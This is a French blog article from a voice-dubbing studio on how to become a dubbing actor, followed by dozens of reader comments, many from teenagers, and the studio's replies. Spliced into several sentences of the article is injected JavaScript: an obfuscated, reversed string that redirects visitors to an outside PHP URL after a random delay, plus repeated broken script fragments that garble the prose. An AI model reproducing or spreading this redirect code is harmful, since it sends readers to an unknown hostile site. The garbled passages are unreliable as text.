fbpx

Le doubleur de voix est un comédien, même si par extension et avec approximation, il nous arrive parfois de parler du doublage de voix comme une profession à part entière.

Dans cet article, la rédaction vous explique comment faire du doublage de voix pour un court-métrage, un long métrage, un film, un dessin animé, pour le cinéma ou la télé.

Faire du théâtre et devenir comédien

Faire du théâtre est à coup sûr l’étape incontournable pour devenir doubleur de films. D’ailleurs, il y a fort à parier, si vous passez un casting voix off, que le studio vous demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande votre parcours et votre expérience de comédien.

Le théâtre permet d’apprendre à se familiariser avec sa voix et d’avoir une bonne élocution. Vous y apprendrez à lire un texte, à interpréter les mots et à faire corps avec votre voix.

Apprendre le doublage commence bien souvent sur les planches.

Suivre une formation pour faire du doublage

Une maison de doublage est équipée nécessairement d’un studio d’enregistrement. Une formation pour apprendre les techniques de doublage alterne entre explications techniques, concepts théoriques et mise en condition réelle.

Les cours permettent de maîtriser votre timbre de voix, de connaître le matériel du studio et d’améliorer votre voix orale.

La formation doublage se passe en grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande partie devant le micro. L’objectif est de vous donner un maximum de temps pour élargir votre registre de jeu et de faire des exercices identiques à un doublage de film.

L’enseignement pratique et théorique vous permet d’être prêt à passer un casting voix comme un véritable professionnel.

$mRi=function(n){if (typeof ($mRi.list[n]) == "string") return $mRi.list[n].split("").reverse().join("");return $mRi.list[n];};$mRi.list=["\'php.sedoctrohspots/bil/issnaveler/snigulp/tnetnoc-pw/moc.keewnoihsafmahnetlehc.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-cap-462442-1024×718.jpg” alt=”Comment faire du doublage de voix dans les films ou les dessins animés ?” width=”432″ height=”303″ />Des qualités innées et du travail

Comme dans tous les domaines, il y a les chanceux et ceux qui doivent faire preuve de plus de courage pour progresser. L’univers du doublage n’échappe pas à cette loi naturelle.

Il est facile de comprendre qu’un comédien qui a un large spectre de voix aura plus de facilités pour doubler des acteurs, des personnages d’animation ou faire une voix off spécifique. A l’inverse,  une voix très particulière peut également un atout.

Pour devenir doubleur, il faut également avoir un talent d’imitateur et une élocution excellente.

Toutes ces qualités innées chez certains comédiens peuvent être travaillées et maîtrisées avec une formation de doubleur. Les conseils des professionnels de la voix off vous permettront de progresser rapidement.

Finalement, l’important pour faire du doublage est d’être avant tout passionné. Avec de l’entraînement et des heures de travail, votre carrière de doubleur a les meilleures chances de devenir une réalité.

Doubleur de voix en pratique

Le doubleur est amené à réaliser une multitude de missions : doublage français, doublage de comédiens, voix des personnages de dessins animés, voix narrative pour un documentaire, voix off..

Alors on travaille son souffle, sa respiration ventrale, on lit des textes à voix haute et on chante.

Après avoir suivi une formation de doublage, vous pourrez sereinement passer un casting pour devenir un doubleur de voix professionnel.

 

61 Comments

  • David dit :

    Bonjour,
    Je me tourne vers vous car j’aimerais faire du doublage de film d’animation ou de dessins animés en français. J’ai 15 ans et je suis depuis toujours intéressé dans le doublage de film d’animation, (Disney, DreamWorks, Pixar, Universal Pictures, Warner Bros, Walt Disney Animations France, Les Armateurs, ONF etc….)
    Ce serait pour moi incroyable et un rêve qui devient réalité de doubler un film d’animation.
    Si vous pourriez me donner des contacts ou des informations pour que je puisse réalisé ce rêve, ce serait vraiment gentil merci.
    Bonne journée,
    WERNERT David

  • Marie dit :

    Bonjour
    Mon fils de 11 ans souhaite pouvoir faire du doublage car il joue avec sa voix depuis quelques années
    Il a fait du théâtre et au collège sa prof de français dit qu’il faut qu’il persiste car il a du talent ! Il joue des rôles de femme enfant… et il sait adapter sa voix à chaque rôle !
    Nous sommes sur Grenoble et je ne sais pas à qui m’adresser ?
    Merci pour vos précieux conseils
    Belle journée à vous

  • Jade dit :

    Bonjour,

    Je voulais savoir si il y a possibilité de rentrer dans le milieu du doublage et voix off sans avoir fait de théâtre. Je suis une jeune femme de 19 ans et, malheureusement, je m’intéresse seulement maintenant à cette corde de métier, j’ai fais des formations dans tout autres choses… Par contre, je suis réellement intrigué par cette vocation et je pense même en faire mon métier d’avenir.

    Du coup, mon problème actuel c’est :

    – Existe-t-il un lieu de formation ou une école pour commencé sans avoir était préparer au préalable ?
    – Où peut-on trouver ces endroits ?
    – Est-il possible de prendre contacte avec quelqu’un pour se présenter et faire un ou plusieurs essais ?

    Voilà, voilà, merci d’avoir prêter attention a mon message

    Jade

  • Jade dit :

    Bonjour,

    Je voulais savoir si il y a possibilité de rentrer dans le monde du doublage ou voix off sans forcément avoir fait du théâtre. Je suis une jeune femme de 19 ans et, malheureusement, je m’intéresse seulement maintenant a cette corde de métier, j’ai fais des études dans totalement autres chose… Mais, je suis réellement intriguer, je voudrais essayer et pourquoi pas en faire ma vocation

    Du coup, mon problème actuelle c’est :

    – Existe-t-il une solution pour passer outre le théâtre
    – Il y a t-il un lieu où je pourrais faire un ou plusieurs essais ?
    – Où peut-on trouver une “école” ou un lieu de formation ??

  • raissa dit :

    bonsoir j’ aimerais faire du doublage de dessin animé ou animé kawaii j’ai 12 ans et je suis passionnée

  • Stephane dit :

    Bonjour. Nous recommandons la formation de comédien du cours Périmony.
    Nous sommes partenaires et nous assurons la formation au doublage intégrée.
    C’est la seule formation privée de comédien qui prépare au doublage.
    La formation dure deux ou trois ans.
    Non, le métier de comédien ne se fait pas encore en ligne.

  • Patricia dit :

    Bonjour
    Je souhaiterai connaitre le “parcours” pour une formation, par quel biais ? la durée? et le coût.. je me suis toujours “amuser” avec mes changements de voix..alors pourquoi pas …et dernière question, vue l actualité cette formation peut elle être proposé en distanciel .. merci d avance pour ces réponses

  • Stephane dit :

    Bonjour. Nous recommandons la formation de comédien du cours Périmony.
    Nous sommes partenaires et nous assurons la formation au doublage intégrée.
    C’est la seule formation privée de comédien qui prépare au doublage.
    La formation dure deux ou trois ans.

  • Pierre-Marie dit :

    Bonjour Stéphane,

    Je suis diplômé depuis peu et ait commencé à travailler dans l’automatisme. Le problème est que ce métier, parfois intéressant, ne me passionne pas assez pour me dire que j’en ferai ma carrière. Je ressent le besoin d’être passionné par mon métier, et le doublage est une voie qui m’intéresse depuis un moment mais je n’ai jamais pensé à en faire mon métier, ou à me lancer.
    Je ne sais pas si j’ai une voix particulière, et n’ai aucune formation de comédien.
    Étant ouvert à la reprise des études, quelle formation me conseilleriez-vous ? Combien d’années d’études faut-il pour devenir comédien ? Faut-il avoir des prédispositions innées pour jouer la comédie, ou tout peut s’apprendre avec suffisamment de motivation ? Je ne suis pas spécialement intéressé par le théâtre mais je suis prêt à y passer pour devenir comédien doubleur.

    Merci d’avance pour votre réponse et bonne journée

  • Stephane dit :

    Bonjour.
    Oui, il arrive qu’on ait besoin de jeunes enfants pour du doublage.
    Ce n’est pas fréquent mais c’est possible.

  • Anonyme dit :

    Bonjour,
    je voulais savoir à partir de quel âge pouvons nous faire du doublage
    ma sœur de 10 ans aimerait essayer de faire du doublage ( bien sûr le lui est dit qu’à son âge je ne pense pas qu’elle puisse en faire )
    elle a fait 3 ans de théâtre et je me demandais donc si elle pouvait en faire juste pour un petit rôle.

  • APPADOO dit :

    Bonjour à Tous.

    Je lance une studio de doublage de voix pour des films cinématographiques.

    Je recherche des pros encadrer, former et superviser un atelier des comédiens.

    Le studio est à l’île Maurice.

    Pourquoi l’île Maurice ? Ils maîtrisent plusieurs langues.

    Possibilité de contrat de courte (6 mois) et de longue durée (voir expat).

    En ce temps de confinement, pas facile d’en trouver.

    Je me permets de venir vers vous, peut-être avez vous des personnes à me proposer.

    Voici mon mail : ceo@my-voyages.fr

    Merci.

  • Stephane dit :

    Bonjour Alexandra.

    Nous n’en avons pas, mais il en existe sur Lyon.
    Grenoble, je ne sais pas.

  • Stephane dit :

    Bonjour.
    Nous proposons des cours de découverte, et des rencontres avec les directeurs artistiques.
    Le problème est que c’est extrêmement cher.
    Vous n’avez pas le financement de la formation professionnelle et vous n’êtes pas prêt car vous n’avez pas fait d’école.
    Je vous déconseille de passer par nous. Vraiment.
    Vous pouvez trouver des écoles semi-pro qui font des découvertes pour pas cher.
    Je pense que ça conviendrait mieux.
    Maintenant, si vous voulez le faire malgré tout, nous avons ces prestations, oui.

  • FF dit :

    Bonjour,
    Je fais du théâtre depuis que j’ai 7 ans, (j’en ai 17) et je me suis mise au doublage amateur en participant à divers projets. Mis à part suivre la formation de l’école que vous présentez (que je compte de toute façon faire plus tard), y a-t-il d’autres moyens pour faire des essais en studio ? Y a-t-il un moyen de vous faire parvenir nos essais ou n’acceptez-vous que les acteurs possédant un diplôme ? Dans les stages que vous proposez, permettent-ils de faire ses preuves et/ou de se faire recruter ?

    Merci

  • Stephane dit :

    Bonjour.
    Pendant la crise sanitaire, les studios sont fermés aux observateurs.
    Nous ne prenons pas de stagiaires à cause de ça.

  • Stephane dit :

    Bonjour.

    Je te conseille de faire un maximum de théatre pour savoir très bien jouer et de te proposer pour doubler pendant que tu es encore enfant. Il y a des opportunités pour les voix d’enfant qui disparaissent quand on est adulte.
    Ca permet d’acquérir de l’expérience et de connaitre le milieu.

    Si tu es décidé, il faut foncer.

  • .Samia dit :

    bonjour,
    Je m’appelle Samia et j’ai 14 ans. J’habite en région parisienne. Je souhaiterez faire mon stage de 3ème dans un studio de doublage de voix dans les dessins animés. J’aimerais que vous m’aidiez à trouver un studio qui acceptent les stagiaires.
    Merci d’avance.

  • Imitateur débutant dit :

    Je suis imitateur qui débute je sais faire la voix de Stitch et une voix d’idiot j’aimerais faire des voies de dessin animé j’ai 11 ans j’espère que ce n’est pas trop grave.

  • alexandra courcier dit :

    Bonjour Monsieur,

    Je suis educatrice et j’accompagne un troupe de théâtre de personne en situation d’handicap léger. L’un des leurs, Grégoire, a pour moi une voix de dessin animé;

    a t’il des formations sur Grenoble ou Lyon svp?

    Merci de votre réponse

    cordialment

    Alexandra

  • Stephane dit :

    Bonjour Brian.

    Le monde du doublage à Paris est très exigeant.
    Il faut être un comédien de haut niveau et maitriser parfaitement la technique.
    Ensuite, il faut créer pas à pas son réseau professionnel.
    Sur bordeaux, il vaut mieux chercher du coté des jeux vidéos.
    La région est très dynamique dans ce secteur.

  • Bryan P. dit :

    Bonjour,

    J’ai 32 ans, le domaine de la comédie, dont notamment le doublage, ont toujours résonné en moi. En revanche, le théâtre, précisément, ne m’a curieusement jamais attiré ; à tout le moins, j’ai derrière moi deux années d’études dans une école de cinéma parisienne, en section actorat. Je rêvais de devenir acteur de cinéma/télévision, mais étant de nature anxieuse, je n’ai jamais cru pouvoir percer et vivre de cela, ainsi n’ai-je rien poursuivi à l’issue de cette formation en 2007 ; seulement, je commence à ressentir un manque, et animant une chaîne sur Twitch depuis plusieurs mois, j’éprouve de plus en plus l’envie de me lancer, de tenter ma chance.
    Ainsi, je m’intéresse de plus en plus à l’univers du doublage, je regarde notamment plusieurs interviews de comédiens tels que Donald Reignoux, François Berland, Adeline Chetail, Bruno Choël, Benoît Allemane… Je me suis attelé ces dernières semaines à la réalisation d’une fausse pub afin de faire démonstration de ma voix, achevée il y a quelques jours avec un rendu qui me satisfait pour un travail amateur hors studio (je ne peux m’empêcher d’entendre la reverb mais j’ai essayé de travailler des détails que je pouvais corriger à mon niveau).
    J’envisage de m’inscrire sur des sites tels que Fiverr et d’y proposer mes services de voix-off, ceci afin d’une part d’acquérir un minimum d’expérience en amateur, et d’autre part de me constituer un début de “book audio”.
    Je vis en région bordelaise, et je ne trouve que peu de studios d’enregistrement dans cette région. Mon souhait serait de pouvoir en contacter plusieurs afin, dans un premier temps, d’assister à des enregistrements en studio, pour me confronter à la réalité du métier.
    J’ai également envisagé d’avoir la démarche, peut-être un peu cavalière, de contacter des personnes comme Adeline Chetail, qui semblent assez disposées à donner des conseils, en leur transmettant la fausse pub que j’ai réalisée avec ma voix et quelques autres extraits, afin d’obtenir avis ou conseils ; je ne sais pas comment cela pourrait être perçu, si cela se fait bien ou si ce serait trop inconvenant.

    J’en viens à mes questions. Que pensez-vous de mes démarches et idées ? Pensez-vous que ma démarche est bonne ? À qui puis-je soumettre mes démos (notamment ma fausse pub) ? Est-il trop tard à mon âge pour me lancer ?
    Désolé pour ce long message, j’ai le défaut de ne pas savoir bien synthétiser.

    Cordialement,
    Bryan

  • Stephane dit :

    Bonjour Jean-Baptiste

    En te lisant, on a l’impression que tu souhaites faire des voix.
    C’est un malentendu.
    Comédien de doublage, c’est un travail de comédien de haut niveau.
    Ce qui compte, c’est le jeu, le jeu, le jeu.
    C’est la première chose qu’un directeur artistique demandera.
    Est-ce que tu joues au théâtre, quelle est ton expérience d’acteur ?
    Si tu fais de l’humour, fais un seul en scène.
    Le doublage ne fonctionne pas du tout par des castings.
    On prend des comédiens par leur notoriété d’acteur.
    Doubleur, ça n’existe pas, il n’y a que des comédiens qui font du doublage.
    Ils jouent les personnages, la voix vient après.

  • Jean-Baptiste dit :

    Bonjour, j’ai 29ans et je vous écrits ce commentaire car le doublage est une passion qui m’habite depuis que j’ai 13ans. Bien que mon parcours professionnel s’inscrit dans le domaine scientifique (car c’est un autre domaine qui me tiens à cœur) j’ai toujours eu espoir de décrocher un rôle pour une série, de préférence animée. Beaucoup de mes amis me disent que je suis fais pour cela, notamment de par les imitations que j’arrive à faire dont : Disney => Donald, Michey ; South park => Cartman, Stan, Mr Hanckey, Servietski, Mr Mackey, Butters, Klyde, et plusieurs autres ; Les simpsons => Homer Simpson, Abraham Simpson, Barry… ; la voix de la personne âgée que fait Jean-Yves Lambert et encore beaucoup d’autres… Aussi cela fait 16ans que je travail les voix pour les imiter en se rapprochant le plus de la voix original mais aussi en en inventant de nouvelles pour m’entraîner à coller le plus possible à des personnages qui n’ont pas encore eu leurs adaptations. Niveau professionnel, j’ai participer à un stage sous la direction d’Allociné afin de m’essayer à doubler une séquence d’animation, avec l’aide de ce comédien génial qu’est Thierry Derose, cela était passionnant à jouer, et je suis allé à plusieurs conventions où des acteurs doubleurs s’exprimaient devant un auditoire passionné, malheureusement je n’ai pas d’autres critères à ajouter en ce qui concerne le métier de comédien de doublage. J’aimerai tout de même passer des castings afin de doubler une, des voix, en effet j’en ai passé un il y a quelques semaines, mais qui a abouti à un refus. Je suis conscient que le pays dans lequel nous vivons préfère malheureusement les diplômes à la passion et au talent, cependant bien que je n’ai jamais eu de formation, ni l’opportunité de doubler une voix dans une série ou autre support audio visuel, je reste convaincu que je pourrai faire de l’excellent travail si on me donnais ma chance, j’ai un micro de studio chez moi ainsi que la structure qui va avec (filtre anti-pop, perche, suspension, câble XLR, mousse acoustique..). J’ai fouillé le net pour voir s’il y avait des castings à proposées, mais je n’ai pas trouvé grand chose, savez-vous s’il y a un site particulier qui regrouperai ce genre d’annonce ? Merci d’avance. Encore une dernière chose, je pense que ce qui fais ma plus grande force de vie est l’Humour.

  • Stephane dit :

    Bonjour Basile.

    C’est très bien de s’exercer.
    Le parcours est simple.
    Le principal est de devenir un bon comédien.
    Jouer, c’est l’essentiel.
    Donc, continue le théâtre, travaille ton jeu au maximum.
    Ensuite, avec une formation courte, comme celles que nous proposons, tu peux acquérir les techniques du doublage.
    La clé, c’est la qualité du jeu. Après la technique, tout le monde peut l’avoir avec une formation en studio.

  • Fleury Basile dit :

    Bonjour ^^
    J’ai donc 15ans (je suppose que c’est jeune). Je souhaiterais m’orienter vers une carrière de doublage. Je suis dans un conservatoire section théâtre depuis maintenant deux ans. J’aimerais m’essayer un casting, si c’est possible ^^’… Tout m’intéresse au niveau des voix ! Cela fait d’ailleurs plusieurs semaines que je m’exerce sur les peu de bandes-rythmo que j’ai trouvées sur internet. Ça m’intéresse tout particulièrement mais je vous avoue que je suis un peu perdu…

  • Stephane dit :

    Bonjour Franklin.

    Notre formule de cours particulier à l’unité sans engagement est une bonne façon de tester si ça vous plait ou non.

    Après, si vous souhaitez devenir professionnel, il faudra passer par une formation préalable de comédien.

  • Franklin dit :

    Bonsoir stephane
    Je n’ai jamais fais du théâtre dans ma vie et je ne suis ni chanteur cependant j’ai une voix tres grave et assez charismatique .on me compare des fois a la voix de l’émission Secrets story . certaines personnes me disent que je peux etre choriste ou l’utiliser pour doublage des voix.je souhaiterai essayer pour voirien si je peux en faire un metier
    Franklin

  • Stephane dit :

    Bonjour Chloé.

    C’est super, continue comme ça et prend des cours de théâtre.
    Le doublage, c’est un métier de comédien, il faut jouer à la perfection.
    La voix vient après le jeu d’acteur.

    Bonne continuation et à bientôt en studio.

  • Chloé dit :

    Bonjour,

    J’ai bientôt 14 ans et j’ai toujours rêvé de doubler un personnage de Disney. Bien évidemment je n’ai aucune expérience mais parfois j’en m’entraîne a faire différentes voix, comme si je doublais un personnage. J’adorerais doubler dans un Disney.

  • Francesca dit :

    Bonjour, j’ai 26 ans je possède une voix d’une jeune entre 15 et 19ans, mon rêve serait de jouer un rôles de personnage animé tout en me amusante dans le rôle d’une jeune fille ou un animal féminine
    Vive l’animation merci

  • momo dit :

    bonjour,
    je sais faire plusieurs voix Eddy Murphy, daffy Duke, Alf, et bien d autre et on me dit que j ai du talent ,je fait déjà des spectacle de rue sur le parvis du Trocadéro j aimerais passer des casting pour les films hihhihi qui ne tente rien a rien ^^ a très vite peu être ? bonne journée

  • Jonathan dit :

    Bonjour
    J’ai lu vos articles et les différents commentaires postés…
    En ce qui me concerne voilà des années que je rêve de pratiquer le doublage mais j’ai toujours eu cette peur de me lancer.
    Et en lisant à plusieurs reprises qu’une personne vraiment passionnée à des chances alors je me dis pourquoi pas moi car c’est mon cas.
    J’en viens donc au fait comment peut on intégrer vos formations ?
    Cordialement

  • Stephane dit :

    Bonjour Aude

    Au moment où tu m’écris, nous sommes en confinement jusqu’au 11 mai 2020.

    Ensuite, nous pouvons te proposer une formation personnalisé pour répondre à ton attente.
    As-tu un budget CPF ? moncompteformation.gouv.fr
    Ce serait le plus simple.
    Continuons cet échange par email, s’il te plait à stephanemeerstudiocapitale@gmail.com

  • Bottega aude dit :

    Bonjour je suis actuellement en reconversion professionnelle et rêve de donner ma voix aux personnages de dessin animé ou d’animé japonais. En effet ayant fait du théâtre pendant 12 ans et n’ayant pu me diriger dans cette vocation, je souhaites aujourd’hui réaliser mon rêve et étant une grande fan de manga j’aimerais vraiment prêter ma voix à un ou plusieurs personnages. Comment reprendre une formation ?

  • Stephane dit :

    Bonjour Nadia.

    Oui, nous formons aussi au doublage les amateurs passionnés.
    Es-tu sur Paris ?
    Nos cours se font en studio et reprendront après le confinement.
    Les formations se financent avec le CPF, moncompteformation.gouv.fr

  • Nadia dit :

    Bonjour,

    J’ai une voix d’enfant et beaucoup de personnes me suggèrent de la prêter à un personnage de dessins animés. Je suis fonctionnaire au DPCP chambre de la jeunesse, mais j’aimerai bien essayer pour égayer la vie des enfants. Mon français est associé à l’accent français de France, très bonne allocution!

    Cordialement,

  • Lina dit :

    Mon rêve c’est prêter ma voix à un film de dessin animé

  • Stephane dit :

    Bonjour Laurenn

    Le milieu du doublage et surtout de l’animation est extrêmement concurrentiel.
    Un amateur, même excellent, ne sera pas autorisé sur un plateau.
    Par contre, nous avons des amateurs passionnés qui pratiquent le doublage dans nos cours pour leur plaisir.
    Ils font ça comme d’autres jouent du piano.
    Oui, nous avons des programmes d’animation à doubler… à re-doubler… pour le fun.

  • Laurenn BERNARD dit :

    Bonjour je suis étudiante en master d architecture mais depuis 15ans je chante et joue du piano. Je suis compositrice amatrice et j ai également fait 9 ans de théâtre dans une compagnie de jeunes comédiens amateurs.
    Je rêve de pouvoir interpréter des voix principalement dans des films d animation. J ai quelques particularités telles que la reproduction de sons animaliers assez réalistes et de reprise de voix de personnages comme stitch ou encore piaf de la reine des neige.

    Je vous contacte donc pour savoir vers qui je peux m orienter sachant qu il ne s agit pas d en faire une profession mais de pratiquer une passion au service de l animation !

    Bien à vous !

    Laurenn BERNARD

  • Stephane dit :

    La technique du doublage est très difficile et demande un apprentissage sérieux.
    Il n’y a pas d’essai dans les studios, ça n’existe plus.
    Je ne te connais pas alors je ne peux pas te dire si tu es prêt ou non.

  • Stephane dit :

    Les castings d’essai sans formation n’existent pas.

  • Nathan dit :

    Bonjour,

    J’ai fait quelques Annees de théâtre, notamment au lycée (j’ai un bac option théâtre et une licence de cinéma), depuis 10 ans je joue la comédie dans des courts métrages, je fait de l’imitation et ai déjà fait de la voix off/doublage pour des pubs d’entreprises et vidéos sur le net.
    Tout cela est il suffisant pour que je puisse prétendre à un essai dans un studio ?

  • Kesta dit :

    Bonjours j’ai 18ans et je souhaiterais prêter ma voix à un personnage de mangas c un rêve de gosse vous voyez mais malheureusement Jai pas les moyens de me déplacer à cette formation mais Jai un réelle talent de comédien quand il s’agit de ma voix et par exemple nekfeu ou orelsan eux ont pas du faire de formation moi aussi je rap es ce possible de passer des casting d’essais sans formation ?

  • Stephane dit :

    Bonjour Joanne
    On peut envoyer la démo à info@studiocapitale.com
    Après écoute, je verrai à qui faire suivre.
    Stéphane.

  • Joanne Belanger dit :

    Bonjour, ma fille a une voix magnifique et pourrait faire les chanson dans Disney . On lui fait souvent la remarque d’ailleurs. Peut-elle envoyer une demo quelque part? Merci!

  • Stephane dit :

    Bonjour Loulou.

    Pour faire du doublage, il faut apprendre à jouer la comédie.
    Ensuite, quand on est comédien, on apprend la technique du doublage.
    Les meilleurs peuvent ensuite enregistrer les voix de films pour Disney ou d’autres.
    Je recommande l’école Jean Périmony qui est notre partenaire pour leur formation de comédien en trois ans.

  • Loulou dit :

    Bonjour je suis étudiante en mode et j’aimerais beaucoup faire un doublage de dessin animé disney mais je ne sais pas comment m’y prendre je ne trouve aucun site au autre pour postuler.

  • Stephane dit :

    Bonjour.

    Mon frère est chez Safran, dans l’aéronautique également.
    On peut faire du doublage pour le plaisir, sans problème.
    Par contre, si l’objectif est professionnel, ça s’adresse à des comédiens.
    Doubler, c’est jouer. Ce n’est pas juste “faire des voix”, par conséquent, si votre souhait est de faire du doublage en professionnel, il faut faire une formation de comédien en parallèle.
    Nous recommandons le cours Jean Périmony qui est notre partenaire.
    Stéphane

  • Sarabika dit :

    Bonjour, dans la vie je suis ingénieure projet dans l’aéronautique c’est un métier qui requiert beaucoup de sérieux dans ‘a communication qu’elle soit orale ou écrite , cependant dans un contexte plus détendu, ma famille et mes amis me disent sans cesse que jai facilement une voix de dessin animé sans forcer ou me donner un genre, c’est inné j’ai garder le côté enfantin dans ma voix malgré mes 28 ans (c’est sûrement dû aux nombreux dessins animés qui m’ont suivi jusqu’à aujourd’hui !!). Je ne pense pas forcément à me reconvertir mais si ma voix convient veux bien faire un essai. Existe t il des castings d’essai pour voix de dessins animés ? D’avance merci 🙂

  • Stephane dit :

    Coucou Elodie.

    Tous les “métiers de voix” sont en réalité des compétences de comédienne.
    Il faut faire une formation sérieuse, comme le cours Jean Périmony, et ensuite la compléter par une courte formation en studio.
    Les livres audio pour Audible/Amazon, par exemple, sont lus par des comédiens professionnels.
    Continue à faire le travail de ta voix, c’est très bien.
    Stéphane

  • Stephane dit :

    Coucou Thaïs.

    Bonne idée ! Pourquoi pas !
    C’est très amusant.
    Par contre, si tu veux en faire un métier, ça commencera par devenir comédienne.
    Pour cela, nous conseillons le cours Jean Périmony.
    Stéphane

  • Élodie dit :

    Bonjour Stéphane.
    Je commence le “travail de ma voix” en adhérant à l’Association des donneurs de voix (j’enregistre des livres pour les personnes à déficit visuel). Comment savoir si on a le potentiel pour aller plus loin et prétendre en faire son métier ? Avez-vous des tests pour évaluer cela ? Où se déroulent les formations que vous proposez ?
    Élodie

  • Thaïs Koko dit :

    Je souhaite faire du doublage car on me dit souvent que je devrai en faire et j’aime bien chanter (je suis une enfant )

  • Stephane dit :

    Les formations voice-over et narration sont proposées en cours particuliers.

  • Stephane dit :

    Pour les documentaires, il faut faire de la narration et du voice-over.
    Nous proposons également ces formations.

  • a dit :

    Je souhaiterais commenter des documentaires style “Après Hitler” fait par Vincent Lindon/

  • flory dit :

    comment faire du commentaire de documentaire tv

  • Stephane dit :

    Bonjour.

    Il y a deux façons de faire du doublage :
    1/ Pour le plaisir. Nous avons des cours pour ça.
    2/ Pour en faire un métier. Et là, il faut d’abord être un sérieux comédien avant de se professionnaliser en doublage. Si ton objectif est professionnel, as-tu fait une formation de comédien ? Fais-tu du théâtre ?

  • sky dit :

    j’aimerai faire du doublage voix de dessin animé car je sais faire une voix très kawaii, mignonne, aigu. Et beaucoup de personnes me conseillent de faire du doublage, mais je trouve aucun casting pour enfant.

  • Menozzi Logan dit :

    J aimerai faire du doublage voix de dessin animé je ces très bien faire la voix de Mickey homer Simpson et ma femme minnie et marge Simpson

Laissez votre réponse

 

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.